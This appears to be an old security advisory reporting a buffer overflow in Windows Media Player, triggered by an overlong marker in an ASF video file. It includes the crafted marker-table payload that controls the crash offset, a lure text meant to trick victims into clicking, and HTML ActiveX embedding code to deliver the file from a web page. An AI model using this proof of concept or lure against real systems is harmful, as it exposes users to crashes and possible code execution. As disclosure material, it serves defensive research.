COMMAND

    Media Player

SYSTEMS AFFECTED

    MS Windows Media Player

PROBLEM

    Pauli  Ojanpera  found  following.   If  you  embed  a marker long
    enough in an .ASF video file you can make WMP crash when a  victim
    clicks the marker drop down list under the file during playback.

    Use ASFCHOP.EXE to embed the following script to any ASF file:

        start_marker_table
        0.0
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
        0.1 Click here to bypass the advertisements!
        end_marker_table

    As you can see,  we used a catch  to persuade the victim  to click
    the bar.  When a victim  clicks on the bar, WMP crashes  at offset
    43434343 ("CCCC").

    With WMP7  you have  to use  an ActiveX  object on  a HTML page to
    launch the old  buggy WMP module.   Make sure you  set marker  bar
    visible  in  the   parameters.   We   guess  it's  the   parameter
    "ShowGotoBar".  Dummy example:

    <OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1 name=DSPlay1 type="application/x-oleobject">
    <PARAM NAME="ShowControls" VALUE="-1">
    <PARAM NAME="ShowGotoBar" VALUE="1">
    <PARAM NAME="ShowStatusBar" VALUE="1">
         <PARAM NAME="ControlType" VALUE="2">
         <PARAM NAME="Filename" VALUE="a.asf">
         <PARAM NAME="InvokeURLs" VALUE="-1">
         </OBJECT>

SOLUTION

    Nothing yet.